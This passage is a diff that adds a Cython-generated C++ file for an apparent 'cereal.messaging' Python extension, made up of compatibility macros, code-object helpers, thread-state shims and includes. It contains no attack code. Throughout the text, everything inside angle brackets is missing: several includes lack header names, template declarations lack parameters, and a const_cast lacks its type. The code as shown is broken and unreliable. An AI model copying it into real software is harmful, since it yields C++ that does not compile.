+ #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__cereal__messaging__messaging_pyx +#define __PYX_HAVE_API__cereal__messaging__messaging_pyx +/* Early includes */ +#include +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include +#include "cereal/messaging/impl_fake.h" +#include "cereal/messaging/messaging.h" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 1 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "ascii" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > 